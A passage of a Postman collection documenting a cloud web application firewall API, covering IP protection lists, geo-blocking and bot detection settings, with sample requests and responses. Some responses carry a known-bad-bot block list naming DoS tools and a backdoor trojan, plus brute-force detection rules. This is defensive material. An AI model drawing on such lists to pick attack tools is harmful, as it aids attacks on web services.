GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"397"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"38b68f67-7aad-11e9-b0ef-05fc30bcf5b7"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"Z9k0qFvqIAMFcPA="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5ce21b51-3e531c36b375cb42124a8339;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": {\n        \"_status\": \"enable\",\n        \"template_status\": \"disable\",\n        \"IPProtection\": {\n        \t\"ip-reputation\": \"enable\",\n            \"geo-ip-block\": {\n                \"members\": [\n                    \"Antigua And Barbuda\",\n                    \"Aland Islands\",\n                    \"Afghanistan\"\n                ]\n            },\n            \"ip-list\": {\n                \"members\": [\n                    {\n                        \"type\": \"trust-ip\",\n                        \"name\": \"1\",\n                        \"ip\": \"1.1.1.1,2.2.2.21-2.2.2.27,1::1\"\n                    },\n                    {\n                        \"type\": \"block-ip\",\n                        \"name\": \"2\",\n                        \"ip\": \"3.1.1.1,3.1.1.11-3.1.1.17,2::2-2::14\"\n                    },\n                    {\n                        \"type\": \"allow-only-ip\",\n                        \"name\": \"3\",\n                        \"ip\": \"4.1.1.1-4.1.1.17,4.1.1.19,3::4-3::14\"\n                    }\n                ]\n            }\n        }\n    }\n}"}],"_postman_id":"7296b790-03b9-483b-a805-4c968a4e851e"},{"name":"Update IP Protection","id":"51af4b4d-0a54-42f5-9161-c69970980595","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n\t\"_status\": \"enable\",\n\t\"IPProtection\": {\n\t\t\"ip-reputation\": \"enable\",\n\t\t\"geo-ip-block\": {\n\t\t\t\"members\": [\"Antigua And Barbuda\",\"Aland Islands\",\"Afghanistan\"]}, \n\t\t\"ip-list\": {\n\t\t\t\"members\": [\n\t\t\t\t{\n                    \"type\": \"trust-ip\",\n                    \"name\": \"1\",\n                    \"ip\": \"1.1.1.1,2.2.2.21-2.2.2.27,1::1\"\n                },\n                {\n                    \"type\": \"block-ip\",\n                    \"name\": \"2\",\n                    \"ip\": \"3.1.1.1,3.1.1.11-3.1.1.17,2::2-2::14\"\n                },\n                {\n                    \"type\": \"allow-only-ip\",\n                    \"name\": \"3\",\n                    \"ip\": \"4.1.1.1-4.1.1.17,4.1.1.19,3::4-3::14\"\n                }\n\t\t\t]\n\t\t}\n\t}\n}"},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/ipprotection","description":"<p>Update the configuration information of IP protection. \n<br /><b>Note: A maximum number of 30,000 IPs/IP Ranges is supported, 10,000 for each IP/IP Range type.</b> </p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"properties\": {\n     \"_status\": {\n       \"description\": \"Configure to enable or disable ip protection\",\n       \"type\": \"string\",\n       \"enum\": [\"enable\", \"disable\"],\n       \"default\": \"disable\"\n     },\n     \"template_status\": {\n       \"description\": \"Configure to enable or disable the module's template status\",\n       \"type\": \"string\",\n       \"enum\": [\n         \"enable\",\n         \"disable\"\n       ],\n       \"default\": \"disable\"\n     },\n     \"IPProtection\": {\n       \"type\": \"object\",\n       \"properties\": {\n          \"ip-reputation\": {\n             \"description\": \"Configure to deny requests from clients based upon their current reputation\",\n             \"type\": \"string\",\n             \"enum\": [\"enable\", \"disable\"]\n          },\n          \"geo-ip-block\": {\n             \"description\": \"Configure to block requests from clients by geography\",\n             \"type\": \"object\",\n             \"properties\": {\n                \"members\": {\n                           \"type\": \"array\",\n                   \"items\": {\n                      \"type\": \"string\"\n                   }\n                }\n             }\n          }, \n          \"ip-list\": {\n             \"type\": \"object\",\n             \"properties\": {\n                 \"members\": {\n                    \"type\": \"array\",\n                    \"maxItems\": 10000,\n                    \"items\": {\n                       \"type\": \"object\",\n                       \"required\": [\"ip\"],\n                       \"properties\": {\n                          \"type\": {\n                             \"description\": \"Select either trust-ip or block-ip or allow-only-ip\",\n                             \"type\": \"string\",\n                             \"enum\": [\"trust-ip\", \"block-ip\", \"allow-only-ip\"],\n                             \"default\": \"trust-ip\"\n                          },\n                          \"name\": {\n                             \"description\": \"The sequence number of the IP list items\",\n                             \"type\": \"integer\"\n\n                          },\n                          \"ip\": {\n                             \"description\": \"The client’s source IP address. It can be a single IP or a range of addresses (e.g., 172.22.14.1-172.22.14.256 or 10:200::10:1-10:200:10:100)\",\n                             \"type\": \"string\"\n\n                          }\n                       }\n                    }\n\n                 }\n             }\n          }\n       }\n     }\n   }\n}\n</code></pre>\n<p>After you update the configuration, the API will return successfully.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","ipprotection"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"17deef6e-1517-44a8-9108-dd8dc374ee49","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n\t\"_status\": \"enable\",\n\t\"IPProtection\": {\n\t    \"ip-reputation\": \"enable\",\n\t\t\"geo-ip-block\": {\n\t\t\t\"members\": [\"Antigua And Barbuda\",\"Aland Islands\",\"Afghanistan\"]}, \n\t\t\"ip-list\": {\n\t\t\t\"members\": [\n\t\t\t\t{\n                    \"type\": \"trust-ip\",\n                    \"name\": \"1\",\n                    \"ip\": \"1.1.1.1,2.2.2.21-2.2.2.27,1::1\"\n                },\n                {\n                    \"type\": \"block-ip\",\n                    \"name\": \"2\",\n                    \"ip\": \"3.1.1.1,3.1.1.11-3.1.1.17,2::2-2::14\"\n                },\n                {\n                    \"type\": \"allow-only-ip\",\n                    \"name\": \"3\",\n                    \"ip\": \"4.1.1.1-4.1.1.17,4.1.1.19,3::4-3::14\"\n                }\n\t\t\t]\n\t\t}\n\t}\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/IPProtection","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","IPProtection"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"Endpoint ID"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 20 May 2019 03:13:05 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"26"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"2f3eb3de-7aad-11e9-95f8-bba48c475a4c"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"Z9kyMEhLoAMFsAg="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5ce21b41-b1e2a3fcbc49926c43b795b4;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\"\n}"},{"id":"52591d80-8ba2-4149-a072-9cda7d408adc","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n\t\"_status\": \"enable\",\n\t\"IPProtection\": {\n\t    \"ip-reputation\": \"enable\",\n\t\t\"geo-ip-block\": {\n\t\t\t\"members\": [\"Antigua And Barbuda\",\"Aland Islands\",\"Afghanistan\"]}, \n\t\t\"ip-list\": {\n\t\t\t\"members\": [\n\t\t\t\t{\n                    \"type\": \"trust-ip\",\n                    \"name\": \"1\",\n                    \"ip\": \"1.1.1.1,2.2.2.21-2.2.2.27,1::1\"\n                },\n                {\n                    \"type\": \"block-ip\",\n                    \"name\": \"2\",\n                    \"ip\": \"3.1.1.1,3.1.1.11-3.1.1.17,2::2-2::14\"\n                },\n                {\n                    \"type\": \"allow-only-ip\",\n                    \"name\": \"3\",\n                    \"ip\": \"4.1.1.1-4.1.1.17,4.1.1.19,3::4-3::14\"\n                }\n\t\t\t]\n\t\t}\n\t}\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/IPProtection","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","IPProtection"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"Endpoint ID"}]}},"status":"Forbidden","code":403,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 20 May 2019 03:15:34 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"65"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"882eccb0-7aad-11e9-9a92-c9f5efe41130"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"AccessDeniedException"},{"key":"x-amz-apigw-id","value":"Z9lJgGZ7IAMFctQ="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"HTTP method, resources or permissions not supported\"\n}"},{"id":"e73b9a1a-4f37-4623-8678-e596134ca4fa","name":"Parameter Invalid","originalRequest":{"method":"PUT","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"authorization","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\n\t\"_status\": \"enable\",\n\t\"IPProtection\": {\n\t    \"ip-reputation\": \"enable\",\n\t\t\"geo-ip-block\": {\n\t\t\t\"members\": [\"Antigua And Barbuda\",\"Aland Islands\",\"Afghanistan\"]}, \n\t\t\"ip-list\": {\n\t\t\t\"members\": [\n\t\t\t\t{\n                    \"type\": \"trust-ip\",\n                    \"name\": \"1\",\n                    \"ipaddress\": \"1.1.1.1,2.2.2.21-2.2.2.27,1::1\"\n                },\n                {\n                    \"type\": \"block-ip\",\n                    \"name\": \"2\",\n                    \"ip\": \"3.1.1.1,3.1.1.11-3.1.1.17,2::2-2::14\"\n                },\n                {\n                    \"type\": \"allow-only-ip\",\n                    \"name\": \"3\",\n                    \"ip\": \"4.1.1.1-4.1.1.17,4.1.1.19,3::4-3::14\"\n                }\n\t\t\t]\n\t\t}\n\t}\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/IPProtection","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","IPProtection"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"Endpoint ID"}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 20 May 2019 03:16:32 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"65"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"aac4ddce-7aad-11e9-8574-31f5a4d0dfc1"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"Z9lSkGVOIAMFsNg="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5ce21c10-2f586ef643623e381e1d1f08;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Check failed: {'ip': 'The member ip is not blank!'}\"\n}"}],"_postman_id":"51af4b4d-0a54-42f5-9161-c69970980595"},{"name":"Get Known Bot Info","id":"f31acb3c-a41e-4ef6-8563-0b9d34c532c6","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"https://api.tim.waasonline.com/v1/misc/knownbot-info/?bot-type={{bot-type}}&category={{category}}","description":"<p>Get the known bad bot list by category name.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Authentication</b> section for API key secret details.</p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","misc","knownbot-info",""],"host":["api","tim","waasonline","com"],"query":[{"description":{"content":"<p>malicious-bot</p>\n","type":"text/plain"},"key":"bot-type","value":"{{bot-type}}"},{"description":{"content":"<p>Category of bad bot. Should be one of the categories in DoS Spam Trojan Scanner Crawler</p>\n","type":"text/plain"},"key":"category","value":"{{category}}"}],"variable":[]}},"response":[{"id":"4eab29f3-28d2-4885-93d6-e4796d4a20c8","name":"Get Known Bot Info","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/misc/knownbot-info/?bot-type=malicious-bot&category=DoS","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","misc","knownbot-info",""],"query":[{"key":"bot-type","value":"malicious-bot","description":"malicious-bot"},{"key":"category","value":"DoS","description":"Category of bad bot. Should be one of the categories in DoS Spam Trojan Scanner Crawler"}]}},"_postman_previewlanguage":null,"header":null,"cookie":[],"responseTime":null,"body":"{ \r\n    \"detail\": \"successfully\",\r\n    \"result\": {\r\n        \"category\":\"DoS\",\r\n        \"bot-list\":[\"Siege\",\"Cyberdog\",\"Backdoor.Win32.Vertexbot.A\",\"D3DL0 G00D N1C3\"]\r\n    }\r\n}"}],"_postman_id":"f31acb3c-a41e-4ef6-8563-0b9d34c532c6"},{"name":"Get Bot Detection","id":"fe7ec4fa-5b09-4ecd-9cd0-fc6346882881","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":""},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/botdetection","description":"<p>Get the configuration information of bot detection.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","botdetection"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"f98dbc1b-4b48-4d8b-9534-d66d361c82de","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/botdetection","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","botdetection"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The endpoint id."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 24 May 2019 07:53:17 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"299"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"fd17d6bd-7df8-11e9-a1ed-0d6cbc966dea"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"aLZk7HFGoAMFkJg="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5ce7a2ec-92ccf4fdc292d85410195af7;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": {\n        \"Predefined-Vulnerability Scanning\": \"disable\",\n        \"known-bad-bots-cfg\":[\n        {\"category\":\"DoS\",\"status\":\"enable\",\"bot-disable-list\":[]},\n        {\"category\":\"Spam\",\"status\":\"enable\",\"bot-disable-list\":[]},\n        {\"category\":\"Trojan\",\"status\":\"enable\",\"bot-disable-list\":[]},\n        {\"category\":\"Scanner\",\"status\":\"enable\",\"bot-disable-list\":[]},\n        {\"category\":\"Crawler\",\"status\":\"enable\",\"bot-disable-list\":[]}\n        ],\n        \"known-bad-bots\": \"disable\",\n        \"botdetection\": \"enable\",\n        \"Predefined-Content-Scraping\": \"disable\",\n        \"challenge\": \"disable\",\n        \"Predefined-Crawler\": \"disable\",\n        \"Predefined-Slow-Attack\": \"disable\",\n        \"Predefined-Credential-Based-Brute-Force\": \"disable\",\n        \"brute-login-request-file\": \"^/login.(php|asp|aspx|jsp)\",\n        \"brute-login-occurrence-num\": 10,\n        \"brute-login-within\": 60,\n        \"template_status\": \"disable\",\n        \"action\": \"deny_no_log\",\n        \"known-search-engine\": \"enable\"\n    }\n}"}],"_postman_id":"fe7ec4fa-5b09-4ecd-9cd0-fc6346882881"},{"name":"Update Bot Detection","id":"27f8b68e-08d8-41b6-856a-e50f97977acf","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"description":"<p>Token</p>\n","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"Predefined-Vulnerability Scanning\": \"enable\",\n    \"exception rule\": [\n        {\n            \"signature_name\": \"Known Bad Bots\",\n            \"signature_id\": \"110000004\",\n            \"url\": {\"value\": \"/newbot\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"},\n            \"parameter\": {\"value\": \"abc\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"}\n        }\n    ],\n    \"known-bad-bots\": \"enable\",\n    \"botdetection\": \"enable\",\n    \"Predefined-Content-Scraping\": \"enable\",\n    \"challenge\": \"RBE\",\n    \"Predefined-Crawler\": \"enable\",\n    \"Predefined-Slow-Attack\": \"enable\",\n    \"Predefined-Credential-Based-Brute-Force\": \"enable\",\n    \"brute-login-request-file\": \"^/login.(php|asp|aspx|jsp)\",\n    \"brute-login-occurrence-num\": 10,\n    \"brute-login-within\": 60,\n    \"known-search-engine\": \"enable\",\n    \"action\": \"deny_no_log\"\n}"},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/botdetection","description":"<p>Update the information about bot detection.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">\n{\n  \"type\": \"object\",\n  \"required\": [\n    \"botdetection\",\n    \"known-bad-bots\",\n    \"Predefined-Content-Scraping\",\n    \"Predefined-Slow-Attack\",\n    \"Predefined-Vulnerability Scanning\",\n    \"Predefined-Credential-Based-Brute-Force\",\n    \"known-search-engine\",\n    \"challenge\",\n    \"action\"\n  ],\n  \"properties\": {\n    \"template_status\": {\n      \"description\": \"Configure to enable or disable the module's template status\",\n      \"type\": \"string\",\n      \"enum\": [\n        \"enable\",\n        \"disable\"\n      ],\n      \"default\": \"disable\"\n    },\n    \"botdetection\": {\n      \"description\": \"Configure to enable or disable bot detection\",\n      \"type\": \"string\",\n      \"enum\": [\n        \"enable\",\n        \"disable\"\n      ],\n      \"default\": \"disable\"\n    },\n    \"known-bad-bots\": {\n      \"description\": \"Configure to block bad bots using predefined signatures\",\n      \"type\": \"string\",\n      \"enum\": [\n        \"enable\",\n        \"disable\"\n      ],\n      \"default\": \"disable\"\n    },\n    \"Predefined-Content-Scraping\": {\n      \"description\": \"Configure to to block malicious tools that try to download large amount of contents from your web site\",\n      \"type\": \"string\",\n      \"enum\": [\n        \"enable\",\n        \"disable\"\n      ],\n      \"default\": \"disable\"\n    },\n    \"Predefined-Slow-Attack\": {\n      \"description\": \"Configure to block automatic tools that try to go undetected by generating traffic in low thresholds\",\n      \"type\": \"string\",\n      \"enum\": [\n        \"enable\",\n        \"disable\"\n      ],\n      \"default\": \"disable\"\n    },\n    \"Predefined-Vulnerability Scanning\": {\n      \"description\": \"Configure to block tools that scan your application for vulnerabilities\",\n      \"type\": \"string\",\n      \"enum\": [\n        \"enable\",\n        \"disable\"\n      ],\n      \"default\": \"disable\"\n    },\n    \"Predefined-Credential-Based-Brute-Force\": {\n      \"description\": \"Enable to block brute force attacks that try to obtain user credentials\",\n      \"type\": \"string\",\n      \"enum\": [\n        \"enable\",\n        \"disable\"\n      ],\n      \"default\": \"disable\"\n    },\n    \"brute-login-request-file\": {\n      \"description\": \"Specify the URL used to match requests so that security headers can be applied to responses of the matched requests.\",\n      \"type\": \"string\"\n    },\n    \"brute-login-occurrence-num\": {\n      \"description\": \"When the brute force login occurs more than a certain times in a certain time period, the request will be periodically blocked. The Occurrence defines \\\"how many times\\\".\",\n      \"type\": \"integer\",\n      \"default\": 10,\n      \"minimum\": 1,\n      \"maximum\": 100\n    },\n    \"brute-login-within\": {\n      \"description\": \"When the brute force login occurs more than a certain times in a certain time period, the request will be periodically blocked. The Within (Seconds) defines the \\\"time period\\\".\",\n      \"type\": \"integer\",\n      \"default\": 60,\n      \"minimum\": 1,\n      \"maximum\": 60\n    },\n    \"challenge\": {\n      \"description\": \"Select disable, RBE or CAPTCHA\",\n      \"type\": \"string\",\n      \"enum\": [\n        \"disable\",\n        \"RBE\",\n        \"CAPTCHA\"\n      ],\n      \"default\": \"disable\"\n    },\n    \"known-search-engine\": {\n      \"description\": \"Enable to exempt popular search engines’ spiders from DoS sensors, brute force login sensors, HTTP protocol constraints, combination rate &amp; access control and blocking by geographic location (Geo IP).\",\n      \"type\": \"string\",\n      \"enum\": [\n        \"enable\",\n        \"disable\"\n      ],\n      \"default\": \"enable\"\n    },\n    \"action\": {\n      \"description\": \"Select which action Cloud WAF will take when it detects a crawler or vulnerability scanning or slow attack activities or content scraping activities or illegal user scan  \",\n      \"type\": \"string\",\n      \"enum\": [\n        \"alert\",\n        \"alert_deny\",\n        \"deny_no_log\",\n        \"block_period\"\n      ],\n      \"default\": \"block_period\"\n    },\n    \"known-bad-bots-cfg\": {\n      \"type\": \"array\",\n      \"items\": {\n        \"type\": \"object\",\n        \"required\": [\n          \"category\",\n          \"status\",\n          \"bot-disable-list\"\n        ],\n        \"properties\": {\n          \"category\": {\n            \"description\": \"The attack category\",\n            \"type\": \"string\",\n\"enum\": [\n              \"DoS\",\n              \"Spam\",\n              \"Trojan\",\n              \"Scanner\",\n              \"Crawler\"\n            ]\n          },\n          \"status\": {\n            \"description\": \"Action of the known bad bot category\",\n            \"type\": \"string\",\n            \"enum\": [\n              \"enable\",\n              \"disable\"\n            ],\n            \"default\": \"enable\"\n          },\n          \"bot-disable-list\": {\n            \"type\": \"array\",\n            \"items\": {\n              \"type\": \"string\",\n              \"description\": \"Knownbotdisablelist\"\n            }\n          }\n        }\n      }\n    }\n  }\n}\n</code></pre>\n<p>After you update the configuration, the API will return successfully.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","botdetection"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"fa18a89a-6777-4004-8356-bf6cb9f8764d","name":"Success","originalRequest":{"method":"PUT","header":[{"description":"Token","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"Predefined-Vulnerability Scanning\": \"enable\",\n    \"exception rule\": [\n        {\n            \"signature_name\": \"Known Bad Bots\",\n            \"signature_id\": \"110000004\",\n            \"url\": {\"value\": \"/newbot\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"},\n            \"parameter\": {\"value\": \"abc\",\"operator\": \"STRING_MATCH\", \"status\": \"enable\"}\n        }\n    ],\n    \"known-bad-bots\": \"enable\",\n    \"botdetection\": \"enable\",\n    \"Predefined-Content-Scraping\": \"enable\",\n    \"challenge\": \"RBE\",\n    \"Predefined-Crawler\": \"enable\",\n    \"Predefined-Slow-Attack\": \"enable\",\n    \"Predefined-Credential-Based-Brute-Force\": \"enable\",\n    \"action\": \"deny_no_log\",\n    \"known-search-engine\": \"enable\"\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/botdetection","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","botdetection"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"Endpoint ID"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 02 Jul 2019 03:49:55 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"391"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"739f2d1a-9c7c-11e9-9c05-9d7e3b5a0464"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"cLYfVHNuoAMFaSw="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5d1ad462-48167d84caaffed847e69466;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"Predefined-Vulnerability Scanning\": \"enable\",\n    \"known-bad-bots-cfg\":[\n        {\"category\":\"DoS\",\"status\":\"enable\",\"bot-disable-list\":[]},\n        {\"category\":\"Spam\",\"status\":\"enable\",\"bot-disable-list\":[]},\n        {\"category\":\"Trojan\",\"status\":\"enable\",\"bot-disable-list\":[]},\n        {\"category\":\"Scanner\",\"status\":\"enable\",\"bot-disable-list\":[]},\n        {\"category\":\"Crawler\",\"status\":\"enable\",\"bot-disable-list\":[]}\n    ],\n    \"known-bad-bots\": \"enable\",\n    \"botdetection\": \"enable\",\n    \"Predefined-Content-Scraping\": \"enable\",\n    \"challenge\": \"RBE\",\n    \"Predefined-Crawler\": \"enable\",\n    \"Predefined-Slow-Attack\": \"enable\",\n    \"Predefined-Credential-Based-Brute-Force\": \"enable\",\n    \"brute-login-request-file\": \"^/login.(php|asp|aspx|jsp)\",\n    \"brute-login-occurrence-num\": 10,\n    \"brute-login-within\": 60,\n    \"action\": \"deny_no_log\",\n    \"known-search-engine\": \"enable\"\n}"},{"id":"fbe6c72d-387e-40bf-8948-7a8a74589058","name":"Parameter Invalid","originalRequest":{"method":"PUT","header":[{"description":"Token","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"Predefined-Vulnerability Scanning\": \"enable\",\n    \"known-bad-bots-cfg\":[\n        {\"category\":\"ErrorCategory\",\"status\":\"enable\",\"bot-disable-list\":[]},\n        {\"category\":\"Spam\",\"status\":\"enable\",\"bot-disable-list\":[]},\n        {\"category\":\"Trojan\",\"status\":\"enable\",\"bot-disable-list\":[]},\n        {\"category\":\"Scanner\",\"status\":\"enable\",\"bot-disable-list\":[]},\n        {\"category\":\"Crawler\",\"status\":\"enable\",\"bot-disable-list\":[]}\n    ],\n    \"known-bad-bots\": \"enable\",\n    \"botdetection\": \"enable\",\n    \"Predefined-Content-Scraping\": \"enable\",\n    \"challenge\": \"RBE\",\n    \"Predefined-Crawler\": \"enable\",\n    \"Predefined-Slow-Attack\": \"enable\",\n    \"Predefined-Credential-Based-Brute-Force\": \"enable\",\n    \"action\": \"deny_no_log\",\n    \"known-search-engine\": \"enable\"\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/botdetection","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","botdetection"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"Endpoint ID"}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 24 May 2019 07:58:22 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"65"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"b335b1ba-7df9-11e9-9d88-33a7d041b9c0"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"aLaUqE9TIAMFtBQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5ce7a41d-b640dd9e49944e7b16025eaa;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Check failed: {'category': 'Category ErrorCategory not allowed!'}\"\n}"}],"_postman_id":"27f8b68e-08d8-41b6-856a-e50f97977acf"},{"name":"Get Biometrics Based Detection","id":"c78064cc-9c9e-446b-93e4-1f318b0fd965","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Content-Type","value":"application/json","type":"text"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/biometricsbaseddetection","description":"<p>Get the configuration information of biometrics based detection.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","biometricsbaseddetection"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"741f61a3-19ba-427f-ad5f-81aaf12d5d41","name":"Success","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/biometricsbaseddetection","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","biometricsbaseddetection"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    